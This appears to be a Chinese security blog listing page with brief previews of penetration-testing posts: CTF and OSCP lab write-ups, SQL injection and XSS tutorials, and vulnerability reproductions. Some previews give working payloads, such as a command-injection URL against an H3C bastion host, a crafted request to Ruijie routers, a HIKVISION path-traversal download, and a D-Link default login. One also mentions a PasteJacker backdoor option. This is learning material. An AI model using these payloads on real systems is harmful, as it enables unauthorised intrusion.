文章目录 Cookie注入简介Cookie与注入有什么关系如何设置Cookieaccess数据库与MySQL数据库的区别靶场 sqli-labs less 20判断是否存在注入判断字段数判断显错位判断数据库名判断表名判断字段名获取具体数据 Cookie注入简介 Cookie就是代表你身份的一串字符串，网站根…

ToBeWritten之理解攻击者

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

红队打靶：THE PLANETS: MERCURY打靶思路详解（vulnhub）

目录写在开头第一步：主机发现和端口扫描第二步：Web渗透第三步：获取初步立足点并搜集信息第四步：软连接劫持sudo提权总结与思考写在开头本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶，详述了…

登陆页面/登陆框渗透测试思路

登陆页面/登陆框渗透测试思路 1. 前言2. 登录页利用汇总2.1. 验证码2.1.1. 验证码爆破2.1.2. 验证码回显2.1.3. 注册码回显2.1.4. 无效验证码2.1.5. 验证码复用2.1.6. 短信轰炸2.1.7. 批量注册 2.2. 数据校验2.2.1. 返回包修改2.2.2. 关系校验2.2.3. 未授权登陆/访问2.2.4. 用户…

ToBeWritten之威胁狩猎环境应用

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之改进威胁猎杀：自动化关键角色与成功沟通经验

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

sql 注入文件读写木马植入远程控制

sql 注入文件读写木马植入远程控制一, 检测读写权限查看mysql全局变量 SHOW GLOBAL VARIABLES LIKE %secure%secure_file_priv 空, 则任意读写secure_file_priv 路径, 则只能读写该路径下的文件secure_file_priv NULL, 则禁止读写二, 读取文件, 使用 load_file() 函数…

sql注入(5), sqlmap工具

sql注入, sqlmap工具请注意，在实际操作中使用sqlmap测试和利用SQL注入等安全漏洞应始终符合法律法规和道德准则，并且需要在拥有明确授权的情况下进行。在没有获得适当授权的情况下对任何系统或网络进行渗透测试都是非法的。 sqlmap是由python开发的测…

XSS攻击(3), 实战XSS注入思路

XSS注入, XSS实战思路一, 可以输入文本或直接在url后面提交参数. 网页源码: <input namekeyword value"">对于这种input标签, 首先可以考虑使用 onclick 等事件来执行js. 先输入 <> , " , onclick() 等等提交, 查看页面源代码. 如果输入的符号没…

CVE-2019-9766漏洞实战

1.利用msf生成反向连接的shellcode 2.构造具有反弹shell的MP3文件将上一步标记的部分替换脚本中的shellcode 3.运行脚本,生成恶意mp3文件 4.msf设置监听并运行exploit 5.打开恶意文件 6.攻击机已经获得shell 文笔生疏，措辞浅薄，望各位大佬不吝赐教…

MS17010(永恒之蓝)漏洞实战

曾因苦难多壮志，不教红尘惑坚心。工具检测实战过程使用搜索命令，搜索ms17_010 search ms17_010 搜索网段中主机漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例，show options 看一下配置设置网段，run运行就行了使用攻…

渗透测试工具(3)Burpsuite

笔记目录渗透测试工具(1)wireshark渗透测试工具(2)Nmap渗透测试工具(3)Burpsuite 1.简介是Web应用程序测试，请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。 (1)模块介绍 ①Intercept：用于显示和修改Ht…

H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞

构造poc执行远程命令： /audit/data_provider.php?ds_y2019&ds_m04&ds_d02&ds_hour09&ds_min40&server_cond&service$(id)&identity_cond&query_typeall&formatjson&browsetrue漏洞证明： 文笔生疏&#xff0c…

锐捷NBR 1300G路由器越权CLI命令执行漏洞

执行查看版本的命令不需要其它权限， 访问url： /WEB_VMS/LEVEL15/构造payload数据包： POST /WEB_VMS/LEVEL15/ HTTP/1.1commandshow version&strurlexec%04&mode%02PRIV_EXEC&signnameRed-Giant.回显如下： 测试发现…

真正的强者是夜深人静的时候，把心掏出来缝缝补补，睡醒一觉来又是信心百倍的一天。

D-Link管理系统默认账号密码

默认口令为 admin:admin 登陆成功文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章…

CSP 内容安全策略, 介绍, 配置CSP策略, CSP实战绕过

CSP 内容安全策略一, CSP (内容安全策略)介绍 CSP（内容安全策略）是一种额外的安全层，可以帮助检测和减轻某些类型的攻击，如跨站脚本攻击（XSS）和数据注入攻击。 CSP允许网站管理员定义哪些动态资源允许执…

剪贴板劫持--PasteJacker的使用

启动 PasteJacker [1] Windows [2] Linux [3] Exit第一次是让我们选择要攻击针对的目标系统，这里以Windows系统为例，即我自己的物理机因此键入 1 ，回车 [1] Download and execute a msfvenom backdoor using certutil (Web delivery Past…

python工具HIKVISION视频编码设备接入网关任意文件下载

python工具构造payload /serverLog/downFile.php?fileName../web/html/serverLog/downFile.php漏洞证明文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何…

被动式安全扫描器

W13Scan介绍 W13scan 是基于Python3的一款开源的Web漏洞发现工具,它支持主动扫描模式和被动扫描模式，能运行在Windows、Linux、Mac上。丰富的检测插件使用 usage: w13scan [options]optional arguments:-h, --help show this help message and exit-…

【漏洞复现】H3C路由器信息泄露任意用户登录

漏洞描述通过访问特地址得到密码可进行登录。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中…

反序列化漏洞(4), phar文件反序列化, 漏洞实验, 漏洞利用

一, 简介 1. phar文件 PHAR，全称PHP Archive，是一种将PHP代码和资源打包成一个自包含的文件的格式。这种文件格式可以将PHP代码文件和其他资源集合在一起，实现应用程序、库或插件的分发。在PHP中，Phar广泛应用于打包应用程序、库…

【漏洞复现】泛微E-Office信息泄露漏洞(CVE-2023-2766)

漏洞描述 Weaver E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。 Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。影响版本 Weaver E-Office 9.5版本免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵…

渗透实例------2个星期艰难的渗透纪实

2个星期艰难的渗透纪实 kyo327 入侵原因，需删一帖子，目标用www.111.com代替，前期通过初期的网站文件暴力猜解，扫描到robots.txt这个文件，有以下目录。如图1：图1 再通过对这些文件的访问，从3gadm.php文件的标题栏得到该网站采用的是diy-page8.3的cms，自然可以先用搜索…

ctfshow-反序列化(web271-web276)

目录 web271 web272-273 web274 web275 web276 为什么不用分析具体为什么能成功 ,后面会有几个专题会对php框架进行更深入的了解这里面会专门的研究为什么能够实现RCE 前面作为初步的熟悉首先知道一下他的框架知道框架的风格知道啥版本可以用什么来打首先先不用太研…

内网穿透隐秘隧道搭建

别低头，皇冠会掉；别流泪，贱人会笑。本文首发于先知社区，原创作者即是本人 0x00 前言构建内网隐蔽通道，从而突破各种安全策略限制，实现对目标服务器的完美控制。当我们从外网成功获得攻击点的时候&…

web漏洞总结大全（基础）

前言本文章是和cike_y师傅一起写的，cike_y博客：https://blog.csdn.net/weixin_53912233?typeblog 也欢迎大家对本文章进行补充和指正，共同维护这个项目，本文的github项目地址： https://github.com/baimao-box/Sum…

红队攻防之hash登录RDP

没什么好害怕，孩子放心去飞吧，在你的身后有个等你的家 Restricted Admin Mode 受限管理模式是一项 Windows 功能，可防止将 RDP 用户的凭据存储在建立 RDP 连接的计算机的内存中。这是用来防止用户（管理员）在 RDP 进…

【JavaFX漏扫开发基础】screen类的使用

文章目录一、screen获取屏幕信息二、查看当前屏幕的分辨率DPI三、scene类和两个小知识一个图形化的结构让界面打开一个网页改变鼠标的图案一、screen获取屏幕信息 package javafx.test;import javafx.application.Application; import

burp靶场--信息泄露

burp靶场–信息泄露 https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages ### 什么是信息泄露？ 信息泄露，也称为信息泄漏，是指网站无意中向用户泄露敏感信息。根据具体情况&#xff0…

CFS三层靶机内网渗透

CFS三层靶机内网渗透一、靶场搭建1.基础参数信息2.靶场搭建2.1网卡配置2.2Target1配置2.2.1 网卡配置2.2.2 Target1 BT配置 2.3Target2配置2.3.1 网卡配置2.3.2 Target2 BT配置 2.4Target3配置二、内网渗透Target11.1信息收集1.1.1IP收集1.1.2端口收集1.1.3目录收集 1.2 webs…

红队攻防之ActiveMQ漏洞集锦

要么拼命，要么滚回去 ActiveMQ 信息泄漏实战 telnet x xActiveMQ Console 存在默认弱口令实战 Apache ActiveMQ 默认开启了控制台，输入默认的账号密码admin/admin 登录成功 ActiveMQ 反序列化漏洞实战执行： java -jar jmet-0.1.0…

【漏洞复现】云时空社会化商业ERP系统gpy文件上传

漏洞描述用友软件的先进管理理念，汇集各医药企业特色管理需求，通过规范各个流通环节从而提高企业竞争力、降低人员成本，最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标，是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。时空云社会化商业ERP gpy…

ctfshow-反序列化(web267-web270)

目录 web267 web268 web269 web270 总结 web267 页面用的什么框架不知道看源码看一下框架就是一种软件工具，它提供了一些基础功能和规范，可以帮助开发者更快地构建应用程序。比如Yii框架和ThinkPHP框架就是两个流行的PHP框架，它们提供…

Neos的渗透测试靶机练习——DarkHole-2

DarkHole-2 一、实验环境二、开始渗透1. 搜集信息2. git文件泄露3. SQL注入4. 提权三、总结一、实验环境虚拟机软件：VirtualBox 攻击机：kali linux（网卡初始为仅主机模式，要有安全意识） 靶机：DarkHole-…

fastjson1.2.24 反序列化漏洞(CVE-2017-18349)分析

FastJson在< 1.2.24 版本中存在反序列化漏洞，主要原因FastJson支持的两个特性： fastjson反序列化时，JSON字符串中的type字段，用来表明指定反序列化的目标恶意对象类。fastjson反序列化时，字符串时会自动调用恶意对…

burp靶场--xss上篇【1-15】

burp靶场–xss https://portswigger.net/web-security/cross-site-scripting 1. 什么是xss: 跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞。XSS 允许攻击者将恶意代码注入网站，然后在访问该网站的任何人的浏览器中执行该代码。这可能允许攻击…

burp靶场--xss下篇【16-30】

burp靶场–xss下篇【16-30】 https://portswigger.net/web-security/all-labs#cross-site-scripting 实验16：允许使用一些 SVG 标记的反射型 XSS ### 实验要求： 该实验室有一个简单的反射型 XSS漏洞。该网站阻止了常见标签，但错过了一些 S…

【Vue渗透】Vue Devtools 浏览器插件

下载地址 Vue Devtools 浏览器插件 Vue站点渗透思路【Vue渗透】Vue站点渗透思路简介 Vue Devtools 是 Vue 官方发布的调试浏览器插件，可以安装在 Chrome 和 Firefox 等浏览器上，直接内嵌在开发者工具中，使用体验流畅。Vue Devtools 由…

敏感信息泄露漏洞

法律声明参与培训需要遵守国家法律法规，相关知识只做技术研究，请勿用于违法用途，造成任何后果自负与本人无关。中华人民共和国网络安全法（2017年6月1日起施行） 第二十二条任何个人和组织不得从事入侵他人网络、干扰…

Metasploit Pro 4.22.3-2024040301 (Linux, Windows) - 专业渗透测试框架

Metasploit Pro 4.22.3-2024040301 (Linux, Windows) - 专业渗透测试框架 Rapid7 Penetration testing, Release Apr 03, 2024 请访问原文链接：Metasploit Pro 4.22.3-2024040301 (Linux, Windows) - 专业渗透测试框架，查看最新版。原创作品&#xff0…

研判特征流量

研判溯源应急准备-检测-抑制-根除-恢复-跟踪总结中级内存马的判断和清除： 判断方式：先判断是通过什么方法注入的内存马，可以先查看web日志是否有可疑的web访问日志，如果是filter或者listener类型就会有大量url请求路径相同…

安全威胁情报的漏洞挖掘

前段时间edu上出现了两个网安总队收取安全情报，不收漏洞，下面简单分析一下如何挖掘安全情报。在发现在edu中新增了两个网安总队收安全情报等漏洞，那威胁情报又会包含哪些内容呢？以前或许会看到各种ss网站、bc网站、yx网站满天飞&…

深度剖析：网络安全中的红蓝对抗策略

红蓝对抗红蓝对抗服务方案在蓝队服务中，作为攻击方将开展对目标资产的模拟入侵，寻找攻击路径，发现安全漏洞和隐患。除获取目标系统的关键信息（包括但不限于资产信息、重要业务数据、代码或管理员账号等）外&#x…

OSCP靶场--DVR4

OSCP靶场–DVR4 考点(1.windows：路径遍历获取私钥getshell 2.ssh shell中runas切换用户) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- 192.168.161.179 --min-rate 2000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-29 07:14 EST…

Java反序列化工具ysoserial使用

ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。项目地址 https://github.com/frohoff/ysoserial主要有两种使用方式，一种是运行ysoserial.jar 中的主类函数，另一种是运行ysoserial中的exploit 类，二者…

PHP 基础编程 2

文章目录时间函数dategetdatetime 使用数组实现登录注册和修改密码简单数组增加元素方法修改元素方法删除元素方法具体实现方法数组序列化数组写入文件判断元素是否在关联数组中（登录功能实现）实现注册功能实现修改admin用户密码功能时间函数时区&am…

北京大学漏洞报送证书

获取来源：edusrc（教育漏洞报告平台） url：教育漏洞报告平台(EDUSRC) 兑换价格：30金币获取条件：北京大学任意中危或以上级别漏洞

Struts2 远程代码执行漏洞S2-001分析

自 Struts2 在 2007 年爆出第一个远程代码执行漏洞 S2-001 以来，在其后续的发展过程中不断爆出更多而且危害更大的远程代码执行漏洞，而造成 Struts2 这么多 RCE 漏洞的主要原因就是 OGNL 表达式。这里以 Struts2 的第一个漏洞 S2-001 为例来对 Struts2 远…

知道IP怎么反查域名？这几个方法一查一个准！

知道网络IP怎么反查出真实域名来？给大家分享几个我常用的方法，就算你不懂技术你都能查得出来！ 一、fofa 这是一个白帽黑客非常喜欢用的社工平台，只要你输入IP就能查到很多背后的信息。传送门：https://fofa.info 二…

【SQL注入】SQLMAP v1.7.11.1 汉化版

下载链接【SQL注入】SQLMAP v1.7.11.1 汉化版简介 SQLMAP是一款开源的自动化SQL注入工具，用于扫描和利用Web应用程序中的SQL注入漏洞。它在安全测试领域被广泛应用，可用于检测和利用SQL注入漏洞，以验证应用程序的安全性。 SQL注入是一种…

慢速 HTTP 攻击 Slow HTTP Attack漏洞原理以及修复方法

漏洞名称 ：Slow Http attack、慢速攻击漏洞描述：慢速攻击基于HTTP协议，通过精心的设计和构造，这种特殊的请求包会造成服务器延时，而当服务器负载能力消耗过大即会导致拒绝服务。HTTP协议规定，HTTP Reques…

burp靶场--ssrf

burp靶场–ssrf 1.什么是ssrf 服务器端请求伪造是一种 Web 安全漏洞，允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中，攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下，他们可…

ctfshow命令执行(web29-web52)

目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 web45 web46 web47 web48 web49 web50 web51 web52 web29 <?php error_reporting(0); if(isset($_GET[c])){$c $_GET[c];if(!preg_match…

burp靶场--文件上传

burp靶场–文件上传 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload 1.文件上传 1、原理：文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统，而不充分验证文件的名称、类型、…

ctfshow-XXE(web373-web378)

目录 XXE（外部实体注入攻击） web373 web374 web375 web376 web377 web378 知识点 XXE（外部实体注入攻击） XXE这几关有个前提flag在根目录下文件名为flag web373 <?php error_reporting(0); libxml_disable_entity_…

OSCP靶场--Exfiltrated

OSCP靶场–Exfiltrated 考点(1.cms 站点地图插入php反弹shell 2. CVE-2021-4034提权 3.root定时任务提权[CVE-2021-22204]) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- 192.168.155.163 --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) a…

【漏洞复现】科立讯通信指挥调度平台editemedia.php sql注入漏洞

漏洞描述在20240318之前的福建科立讯通信指挥调度平台中发现了一个漏洞。该漏洞被归类为关键级别，影响文件/api/client/editemedia.php的未知部分。通过操纵参数number/enterprise_uuid可导致SQL注入。攻击可能会远程发起。免责声明技术文章仅供参考，任何个人和组织使…

Web应用安全攻防战：识别十大威胁，掌握防护要点

OWASP（Open Worldwide Application Security Project）是一家致力于应用安全威胁研究的非盈利机构。通过对超过20万个组织进行调研分析，该机构每三年左右就会发布一次《Web应用安全风险Top10》报告，这个报告已经成为全球企业开展We…

攻防演练利器：六款蓝队开源防御工具特点剖析

实战化的攻防演习活动一般具有时间短、任务急等特点，作为防守方，蓝队需要在日常安全运维工作的基础上，从攻击者角度出发，了解攻击者的思路与打法，并结合本单位实际网络环境、运营管理情况，制定相应的技术防…

burp靶场--CSRF

burp靶场–CSRF https://portswigger.net/web-security/csrf#what-is-csrf ### 什么是 CSRF？ 跨站请求伪造（也称为 CSRF）是一种 Web 安全漏洞，允许攻击者诱导用户执行他们不打算执行的操作。它允许攻击者部分规避同源策略&#…

记一次某竞赛中的渗透测试（Windows Server 2003靶机漏洞）

靶机简介 Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统，它基于Windows XP/Windows NT 5.1进行开发，并在同年4月底上市。以下是关于Windows Server 2003的详细介绍： 系统名称与发布历程： 该产品最初被命名为…

【漏洞复现】SpringBlade export-user接口存在SQL注入漏洞

漏洞描述 SpringBlade 是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建，完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。SpringBlade export-user接口存在SQL注…

ctfshow-文件上传(web151-web161)

目录 web151 web152 web153 web154 web155 web156 web157 web158 web159 web160 web161 web151 提示前台验证不可靠那限制条件估计就是在前端设置的上传php小马后弹出了窗口说不支持的格式查看源码这一条很关键这种不懂直接ai搜意思就是限制了上传类型允许…

精通Nmap：网络扫描与安全的终极武器

一、引言 Nmap，即NetworkMapper，是一款开源的网络探测和安全审计工具。它能帮助您发现网络中的设备，并识别潜在的安全风险。在这个教程中，我们将一步步引导您如何有效地使用Nmap，让您的网络更加安全。因为Nmap还有图…

OSCP靶场--Codo

OSCP靶场–Codo 考点 1.nmap扫描 ## ┌──(root㉿kali)-[~/Desktop] └─# nmap 192.168.229.23 -Pn -sV -sC --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-25 05:04 EDT Nmap scan report for 192.168.229.23 Host is up (0.35s latency). Not sh…

SQL-Labs靶场“29-31”关通关教程

君衍. 一、二十九关基于错误的WAF单引号注入1、源码分析2、HTTP参数污染3、联合查询注入4、updatexml报错注入二、三十关基于错误的WAF双引号注入1、源码分析2、联合查询注入3、updatexml报错注入三、三十一关基于错误的WAF双引号括号注入1、源码分析2、联合查询注入3、up…

2024护网面试题精选(二）完

0x02. 内网渗透篇 00- 内网渗透的流程拿到跳板后，先探测一波内网存活主机，用net user /domian命令查看跳板机是否在域内，探测存活主机、提权、提取hash、进行横向移动，定位dc位置，查看是否有能直接提权域管的漏洞…

Python(C_Cpp)分析模拟Arduino和Raspberry Pi(单板机)CAN总线和车载单元测试

要点 CAN总线释义：物理层结构，数据帧，数据交换，总线接口物理模块。一对Arduino CAN （Arduino C 处理）总线项目： 发送端发送随机数据，接收端接收并计算。发送端点动信号，…

OSCP靶场--Depreciated

OSCP靶场–Depreciated 考点(1. graphql枚举 2.CVE-2021-4034提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- 192.168.155.170 --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-13 04:19 EDT Nmap scan report for 192.168.…

xss.haozi.me靶场“0x00-0x0A”通关教程

君衍. 一、靶场介绍二、第一关 0x00 不做限制三、第二关 0x01 文本闭合标签绕过四、第三关 0x02 双引号闭合绕过五、第四关 0x03 过滤括号六、第五关 0x04 编码绕过七、第六关 0x05 注释闭合绕过八、第七关 0x06 换行绕过九、第八关 0x07 删除标签十、第九关 0x08 多加空格绕过…

xss.haozi.me靶场“0x0B-0x12”通关教程

君衍. 一、0x0B 实体编码绕过二、0x0C script绕过三、0x0D 注释绕过四、0X0E ſ符号绕过五、0x0F 编码解码六、0x10 直接执行七、0x11 闭合绕过八、0x12 闭合绕过 XSS-Labs靶场“1-5”关通关教程 XSS-Labs靶场“6-10”关通关教程 Appcms存储型XSS漏洞复现 XSS-Labs靶场“11-13、…

Cookie 信息泄露 Cookie未设置http only属性原理以及修复方法

漏洞名称：Cookie信息泄露、Cookie安全性漏洞、Cookie未设置httponly属性漏洞描述： cookie的属性设置不当可能会造成系统用户安全隐患，Cookie信息泄露是Cookiehttp only配置缺陷引起的，在设置Cookie时，可以设置的一个…

小程序绕过 sign 签名

之前看到了一篇文章【小程序绕过sign签名思路】之前在做小程序渗透时也遇到了这种情况，但是直接放弃测试了，发现这种思路后，又遇到了这种情况，记录下过程。并没有漏洞分享，仅仅是把小程序也分享出来，方便…

【漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露

漏洞描述京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未…

OSCP靶场--Zipper

OSCP靶场–Zipper 考点(php zip:// rce[文件上传] CVE-2021-4034提权7z 通配符提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap 192.168.249.229 -sV -sC -Pn --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 07:40 EDT …

OSCP靶场--RubyDome

OSCP靶场–RubyDome 考点(CVE-2022-25765 suid ruby提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -Pn -sC -sV 192.168.249.22 --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 00:28 EDT Nmap scan report for 192.168.249.22 Hos…

应急响应靶机训练-Linux2题解

前言接上文，应急响应靶机训练Linux2 靶机地址：应急响应靶机-Linux(2) 题解登录虚拟机： 修改面板密码提交攻击者IP 答案：192.168.20.1 查看宝塔日志即可用的net直接是网关提交攻击者修改的管理员密码(明文) 答案&…

OSCP靶场--Snookums

OSCP靶场–Snookums 考点(RFI信息收集数据库发现凭据bas64解码su切换用户/etc/passwd覆盖提权) 1.nmap扫描 ##┌──(root㉿kali)-[~/Desktop] └─# nmap 192.168.216.58 -sV -sC -Pn --min-rate 2500 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-30 03:39 E…

【漏洞复现】WordPress Plugin LearnDash LMS 敏感信息暴漏

漏洞描述 WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin LearnDash LMS 4.10.2及之前版本存在安全漏洞&#x…

打造高效自动化渗透测试系统：关键步骤与实践

随着当前网络安全威胁的不断扩展与升级，开展渗透测试工作已经成为广大企业组织主动识别安全漏洞与潜在风险的关键过程。然而，传统的人工渗透测试模式对测试人员的专业能力和经验水平有很高的要求，企业需要投入较大的时间和资源才能完成。在此…

记录某靶场内网渗透过程

记录一下红日靶场内网渗透的过程下载红日安全团队的靶场–>下载链接第一步：下载并解压到一个文件夹内第二步、使用VM虚拟机分别添加三个虚拟机，并调整一下网络适配器，使得Win7和其他两个同属于一个局域网，而且Win7可以访问…

【漏洞复现】某科技X2Modbus网关多个漏洞

漏洞描述最近某科技X2Modbus网关出了一个GetUser的信息泄露的漏洞，但是经过审计发现该系统80%以上的接口均是未授权的，没有添加相应的鉴权机制，以下列举多个未授权接口以及获取相关敏感信息的接口。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律…

[VulnHub靶机渗透] pWnOS 2.0

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【Java、PHP】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收…

src挖掘技巧总结分享

src挖洞技术分享 src推荐刚入门的新手首选公益src如漏洞盒子、补天src，因为漏洞盒子收录范围广，只要是国内的站点都收入，相比其它src平台挖掘难度非常适合新手。后续可以尝试先从一些小的src厂商入手。首先是熟能生巧，我一开始挖…

浅析入侵检测系统及最新研究

1. 入侵检测系统 IDS：入侵检测系统（Intrusion Detection System）是一种被动监控方式，用于检测一个团体或者个人的网络安全威胁。如果检测到潜在的网络入侵，入侵检测系统会生成警报，通知安全人员或者采取相…

跨站请求伪造漏洞（CSRF）

什么是CSRF CSRF（Cross-Site Request Forgery），也被称为 one-click attack 或者 session riding，即跨站请求伪造攻击。漏洞原理跨站请求伪造漏洞的原理主要是利用了网站对用户请求的验证不严谨。攻击者会在恶意网站中构造一个…

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

一、漏洞信息漏洞名称：畅捷通T Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞漏洞类别：远程命令执行漏洞风险等级：高危二、漏洞描述畅捷通TPlus适用于异地多组织、多机构对企业财务汇总的管理需求；全面支持企…

OSCP靶场--pyLoader

OSCP靶场–pyLoader 考点(信息收集CVE-2023-0297) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -Pn -sC -sV 192.168.178.26 --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-28 09:14 EDT Nmap scan report for 192.168.178.26 Host is up…

OSCP靶场--law

OSCP靶场–law 考点(CVE-2022-35914 定时任务提权) 1.nmap扫描 ## ┌──(root㉿kali)-[~/Desktop] └─# nmap -Pn -sC -sV 192.168.178.190 --min-rate 2500 Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-28 02:20 EDT Nmap scan report for 192.168.178.190 Host…

nysm：一款针对红队审计的隐蔽型后渗透安全测试容器

关于nysm nysm是一款针对红队审计的隐蔽型后渗透安全测试容器，该工具主要针对的是eBPF，能够帮助广大红队研究人员在后渗透测试场景下保持eBPF的隐蔽性。功能特性随着基于eBPF的安全工具越来越受社区欢迎，nysm也应运而生。该工具能保持各种…